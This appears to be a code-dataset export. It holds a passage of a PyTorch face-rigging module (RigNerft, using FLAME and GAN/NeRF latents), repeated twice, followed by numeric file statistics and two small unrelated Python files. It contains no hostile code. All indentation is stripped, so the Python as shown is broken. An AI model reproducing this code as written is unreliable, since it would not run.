def build_WGanEncoder(self, weight = ''):
WGanEncoder = th.nn.Sequential(
LinearWN( self.gan_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WGanEncoder network')
WGanEncoder.load_state_dict(torch.load(weight))
return WGanEncoder
def build_ShapeEncoder(self, weight = ''):
ShapeEncoder = th.nn.Sequential(
LinearWN( self.shape_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ShapeEncoder network')
ShapeEncoder.load_state_dict(torch.load(weight))
return ShapeEncoder
def build_ExpEncoder(self, weight = ''):
ExpEncoder = th.nn.Sequential(
LinearWN( self.exp_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ExpEncoder network')
ExpEncoder.load_state_dict(torch.load(weight))
return ExpEncoder
def build_WGanDecoder(self, weight = ''):
WGanDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.gan_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WGanDecoder network')
WGanDecoder.load_state_dict(torch.load(weight))
return WGanDecoder
def build_WNerfEncoder(self, weight = ''):
WNerfEncoder = th.nn.Sequential(
LinearWN( self.nerf_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WNerfEncoder network')
WNerfEncoder.load_state_dict(torch.load(weight))
return WNerfEncoder
def build_AlbedoEncoder(self, weight = ''):
AlbedoEncoder = th.nn.Sequential(
LinearWN( self.albedo_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for AlbedoEncoder network')
AlbedoEncoder.load_state_dict(torch.load(weight))
return AlbedoEncoder
def build_LitEncoder(self, weight = ''):
LitEncoder = th.nn.Sequential(
LinearWN( self.lit_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for LitEncoder network')
LitEncoder.load_state_dict(torch.load(weight))
return LitEncoder
def build_WNerfDecoder(self, weight = ''):
WNerfDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.nerf_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WNerfDecoder network')
WNerfDecoder.load_state_dict(torch.load(weight))
return WNerfDecoder
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def rig(self,wgan, wnerf, p):
shapecode, expcode, albedocode, litcode = p[0], p[1],p[2], p[3]
lgan = self.WGanEncoder(wgan)
lshape = self.ShapeEncoder(shapecode)
lexp = self.ExpEncoder(expcode)
deltagan = self.WGanDecoder(torch.cat([lgan, lshape, lexp], axis = 1))
lnerf = self.WNerfEncoder(wnerf)
lalbedo = self.AlbedoEncoder(albedocode)
llit = self.LitEncoder(litcode.view(-1, 27))
deltanerf = self.WNerfDecoder(torch.cat([lnerf, lalbedo, llit], axis = 1))
return deltanerf + wnerf, deltagan + wgan
def flame_render(self,p, pose, cam):
shapecode,expcode,albedocode, litcode = p[0],p[1],p[2],p[3]
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode)
predicted_images = ops['images']
return landmarks3d, predicted_images
def forward(self, shape_latent_v, appearance_latent_v, shape_latent_w, appearance_latent_w, \
cam_v=None, pose_v=None, flameshape_v = None, flameexp_v = None, flametex_v = None,\
flamelit_v = None, cam_w=None, pose_w=None, flameshape_w = None, flameexp_w = None, flametex_w = None, flamelit_w = None):
p_v = self.latent2params(shape_latent_v, appearance_latent_v)
p_w = self.latent2params(shape_latent_w, appearance_latent_w)
# if we input paired WGan and WNerf together with their own P, the rig should output the same WGan and WNerf
shape_latent_w_same, appearance_latent_w_same = self.rig(appearance_latent_w, shape_latent_w, p_w)
p_w_same = self.latent2params(shape_latent_w_same, appearance_latent_w_same)
# randomly choose one parameter to edit
choice = torch.randint(0, 4 ,(1,)).item()
# if we input WGan and Wnerf, and P_v, output hat_WGan, hat_WNerf
p_w_replaced = []
for i in range(4):
if i != choice:
p_w_replaced.append(p_w[i])
else:
p_w_replaced.append(p_v[i])
shape_latent_w_hat, appearance_latent_w_hat = self.rig(appearance_latent_w, shape_latent_w, p_w_replaced)
# map the changed w back to P
p_w_mapped = self.latent2params(shape_latent_w_hat, appearance_latent_w_hat)
p_v_ = []
p_w_ = []
for j in range(4):
if j != choice:
p_w_.append(p_w_mapped[j])
p_v_.append(p_v[j])
else:
p_w_.append(p_w[j])
p_v_.append(p_w_mapped[j])
landmark_same, render_img_same = self.flame_render(p_w_same, pose_w, cam_w)
landmark_w_, render_img_w_ = self.flame_render(p_w_, pose_w, cam_w)
landmark_v_, render_img_v_ = self.flame_render(p_v_, pose_v, cam_v)
if flameshape_v is not None:
p_v_vis = [flameshape_v, flameexp_v, flametex_v, flamelit_v.view(-1, 9,3)]
p_w_vis = [flameshape_w, flameexp_w, flametex_w, flamelit_w.view(-1, 9,3)]
_, recons_images_v = self.flame_render(p_v_vis, pose_v, cam_v)
_, recons_images_w = self.flame_render(p_w_vis, pose_w, cam_w)
else:
recons_images_v = render_img_w_
recons_images_w = render_img_w_
return landmark_same, render_img_same, \
landmark_w_, render_img_w_ , \
landmark_v_, render_img_v_ , \
recons_images_v, recons_images_w
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
class RigNerft(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# function F networks
latent2code = Latent2Code(flame_config, opt)
self.Latent2ShapeExpCode, self.latent2shape, \
self.latent2exp, self.Latent2AlbedoLitCode, \
self.latent2albedo, self.latent2lit = self.get_f(latent2code)
# rigNet
# appearance part
self.WGanEncoder = self.build_WGanEncoder(weight = '' if opt.isTrain else opt.WGanEncoder_weight )
self.ShapeEncoder = self.build_ShapeEncoder(weight = '' if opt.isTrain else opt.ShapeEncoder_weight )
self.ExpEncoder = self.build_ExpEncoder(weight = '' if opt.isTrain else opt.ExpEncoder_weight )
self.WGanDecoder = self.build_WGanDecoder(weight = '' if opt.isTrain else opt.WGanDecoder_weight )
# shape part
self.WNerfEncoder = self.build_WNerfEncoder(weight = '' if opt.isTrain else opt.WNerfEncoder_weight )
self.AlbedoEncoder = self.build_AlbedoEncoder(weight = '' if opt.isTrain else opt.AlbedoEncoder_weight )
self.LitEncoder = self.build_LitEncoder(weight = '' if opt.isTrain else opt.LitEncoder_weight )
self.WNerfDecoder = self.build_WNerfDecoder(weight = '' if opt.isTrain else opt.WNerfDecoder_weight )
# Flame
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def get_f(self,network):
print (network)
print ('loading weights for Latent2ShapeExpCode feature extraction network')
network.Latent2ShapeExpCode.load_state_dict(torch.load(self.opt.Latent2ShapeExpCode_weight))
print ('loading weights for latent2shape feature extraction network')
network.latent2shape.load_state_dict(torch.load(self.opt.latent2shape_weight))
print ('loading weights for latent2exp feature extraction network')
network.latent2exp.load_state_dict(torch.load(self.opt.latent2exp_weight))
print ('loading weights for Latent2AlbedoLitCode feature extraction network')
network.Latent2AlbedoLitCode.load_state_dict(torch.load(self.opt.Latent2AlbedoLitCode_weight))
print ('loading weights for latent2albedo feature extraction network')
network.latent2albedo.load_state_dict(torch.load(self.opt.latent2albedo_weight))
print ('loading weights for latent2lit network')
network.latent2lit.load_state_dict(torch.load(self.opt.latent2lit_weight))
return network.Latent2ShapeExpCode, network.latent2shape, network.latent2exp, \
network.Latent2AlbedoLitCode, network.latent2albedo, network.latent2lit
def latent2params(self, shape_latent, appearance_latent):
shape_fea = self.Latent2ShapeExpCode(shape_latent)
shapecode = self.latent2shape(shape_fea)
expcode = self.latent2exp(shape_fea)
app_fea = self.Latent2AlbedoLitCode(appearance_latent)
albedocode = self.latent2albedo(app_fea)
litcode = self.latent2lit(app_fea).view(shape_latent.shape[0], 9,3)
paramset = [shapecode, expcode, albedocode, litcode]
return paramset
def build_WGanEncoder(self, weight = ''):
WGanEncoder = th.nn.Sequential(
LinearWN( self.gan_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WGanEncoder network')
WGanEncoder.load_state_dict(torch.load(weight))
return WGanEncoder
def build_ShapeEncoder(self, weight = ''):
ShapeEncoder = th.nn.Sequential(
LinearWN( self.shape_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ShapeEncoder network')
ShapeEncoder.load_state_dict(torch.load(weight))
return ShapeEncoder
def build_ExpEncoder(self, weight = ''):
ExpEncoder = th.nn.Sequential(
LinearWN( self.exp_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ExpEncoder network')
ExpEncoder.load_state_dict(torch.load(weight))
return ExpEncoder
def build_WGanDecoder(self, weight = ''):
WGanDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.gan_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WGanDecoder network')
WGanDecoder.load_state_dict(torch.load(weight))
return WGanDecoder
def build_WNerfEncoder(self, weight = ''):
WNerfEncoder = th.nn.Sequential(
LinearWN( self.nerf_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WNerfEncoder network')
WNerfEncoder.load_state_dict(torch.load(weight))
return WNerfEncoder
def build_AlbedoEncoder(self, weight = ''):
AlbedoEncoder = th.nn.Sequential(
LinearWN( self.albedo_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for AlbedoEncoder network')
AlbedoEncoder.load_state_dict(torch.load(weight))
return AlbedoEncoder
def build_LitEncoder(self, weight = ''):
LitEncoder = th.nn.Sequential(
LinearWN( self.lit_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for LitEncoder network')
LitEncoder.load_state_dict(torch.load(weight))
return LitEncoder
def build_WNerfDecoder(self, weight = ''):
WNerfDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.nerf_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WNerfDecoder network')
WNerfDecoder.load_state_dict(torch.load(weight))
return WNerfDecoder
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def rig(self,wgan, wnerf, p):
shapecode, expcode, albedocode, litcode = p[0], p[1],p[2], p[3]
lgan = self.WGanEncoder(wgan)
lshape = self.ShapeEncoder(shapecode)
lexp = self.ExpEncoder(expcode)
deltagan = self.WGanDecoder(torch.cat([lgan, lshape, lexp], axis = 1))
lnerf = self.WNerfEncoder(wnerf)
lalbedo = self.AlbedoEncoder(albedocode)
llit = self.LitEncoder(litcode.view(-1, 27))
deltanerf = self.WNerfDecoder(torch.cat([lnerf, lalbedo, llit], axis = 1))
return deltanerf + wnerf, deltagan + wgan
def flame_render(self,p, pose, cam):
shapecode,expcode,albedocode, litcode = p[0],p[1],p[2],p[3]
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode)
predicted_images = ops['images']
return landmarks3d, predicted_images
def forward(self, shape_latent_v, appearance_latent_v, shape_latent_w, appearance_latent_w, \
cam_v=None, pose_v=None, flameshape_v = None, flameexp_v = None, flametex_v = None,\
flamelit_v = None, cam_w=None, pose_w=None, flameshape_w = None, flameexp_w = None, flametex_w = None, flamelit_w = None):
p_v = self.latent2params(shape_latent_v, appearance_latent_v)
p_w = self.latent2params(shape_latent_w, appearance_latent_w)
# if we input paired WGan and WNerf together with their own P, the rig should output the same WGan and WNerf
shape_latent_w_same, appearance_latent_w_same = self.rig(appearance_latent_w, shape_latent_w, p_w)
p_w_same = self.latent2params(shape_latent_w_same, appearance_latent_w_same)
# randomly choose one parameter to edit
choice = torch.randint(0, 4 ,(1,)).item()
# if we input WGan and Wnerf, and P_v, output hat_WGan, hat_WNerf
p_w_replaced = []
for i in range(4):
if i != choice:
p_w_replaced.append(p_w[i])
else:
p_w_replaced.append(p_v[i])
shape_latent_w_hat, appearance_latent_w_hat = self.rig(appearance_latent_w, shape_latent_w, p_w_replaced)
# map the changed w back to P
p_w_mapped = self.latent2params(shape_latent_w_hat, appearance_latent_w_hat)
p_v_ = []
p_w_ = []
for j in range(4):
if j != choice:
p_w_.append(p_w_mapped[j])
p_v_.append(p_v[j])
else:
p_w_.append(p_w[j])
p_v_.append(p_w_mapped[j])
landmark_same, render_img_same = self.flame_render(p_w_same, pose_w, cam_w)
landmark_w_, render_img_w_ = self.flame_render(p_w_, pose_w, cam_w)
landmark_v_, render_img_v_ = self.flame_render(p_v_, pose_v, cam_v)
if flameshape_v is not None:
p_v_vis = [flameshape_v, flameexp_v, flametex_v, flamelit_v.view(-1, 9,3)]
p_w_vis = [flameshape_w, flameexp_w, flametex_w, flamelit_w.view(-1, 9,3)]
_, recons_images_v = self.flame_render(p_v_vis, pose_v, cam_v)
_, recons_images_w = self.flame_render(p_w_vis, pose_w, cam_w)
else:
recons_images_v = render_img_w_
recons_images_w = render_img_w_
return landmark_same, render_img_same, \
landmark_w_, render_img_w_ , \
landmark_v_, render_img_v_ , \
recons_images_v, recons_images_w
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
| 44.658049 | 142 | 0.626092 | 4,487 | 38,004 | 5.091821 | 0.054379 | 0.012606 | 0.025605 | 0.027575 | 0.959776 | 0.957806 | 0.956712 | 0.954348 | 0.949621 | 0.949621 | 0 | 0.029334 | 0.274313 | 38,004 | 850 | 143 | 44.710588 | 0.799086 | 0.019077 | 0 | 0.90056 | 0 | 0 | 0.069865 | 0.00921 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.030812 | 0 | 0.162465 | 0.057423 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56d7c4899ce8db83258e66b99b1c0e4ee1dbe768 | 329 | py | Python | xadmin/demo_app/app/obj.py | HelloN1co/A-Detection-Tool-for-Traffic-Objects | ead815d3968559dd640257ca946f86ad390495b6 | [
"MIT"
] | null | null | null | xadmin/demo_app/app/obj.py | HelloN1co/A-Detection-Tool-for-Traffic-Objects | ead815d3968559dd640257ca946f86ad390495b6 | [
"MIT"
] | null | null | null | xadmin/demo_app/app/obj.py | HelloN1co/A-Detection-Tool-for-Traffic-Objects | ead815d3968559dd640257ca946f86ad390495b6 | [
"MIT"
] | null | null | null | class His:
id = 0
mid = 0
category = ''
name = ''
srcFilePath = ''
destFilePath = ''
thumnail = ''
result = ''
create_time = ''
class Col:
id = 0
mid = 0
category = ''
name = ''
srcFilePath = ''
destFilePath = ''
thumnail = ''
result = ''
create_time = ''
| 14.954545 | 21 | 0.455927 | 28 | 329 | 5.285714 | 0.5 | 0.040541 | 0.081081 | 0.094595 | 0.891892 | 0.891892 | 0.891892 | 0.891892 | 0.891892 | 0.891892 | 0 | 0.020202 | 0.398176 | 329 | 21 | 22 | 15.666667 | 0.727273 | 0 | 0 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
856e3cd9e18f20a2184e4d12bb69b777b01be7e5 | 322 | py | Python | rocketbot/commands/__init__.py | corewire/rocketbot | a74d7d329b92204fe80bed120edfa0ee0222b321 | [
"MIT"
] | 3 | 2020-01-28T09:30:42.000Z | 2021-06-29T14:56:07.000Z | rocketbot/commands/__init__.py | corewire/rocketbot | a74d7d329b92204fe80bed120edfa0ee0222b321 | [
"MIT"
] | 2 | 2021-02-26T20:42:49.000Z | 2021-03-04T13:59:01.000Z | rocketbot/commands/__init__.py | corewire/rocketbot | a74d7d329b92204fe80bed120edfa0ee0222b321 | [
"MIT"
] | 2 | 2020-01-28T09:36:56.000Z | 2021-09-10T12:18:14.000Z | from rocketbot.commands.base import BaseCommand # noqa: F401
from rocketbot.commands.catchall import ( # noqa: F401
CatchAll, private_message_user
)
from rocketbot.commands.ping import Ping # noqa: F401
from rocketbot.commands.poll import Poll # noqa: F401
from rocketbot.commands.usage import Usage # noqa: F401
| 40.25 | 61 | 0.782609 | 43 | 322 | 5.813953 | 0.348837 | 0.26 | 0.42 | 0.252 | 0.348 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054545 | 0.145963 | 322 | 7 | 62 | 46 | 0.854545 | 0.167702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.714286 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |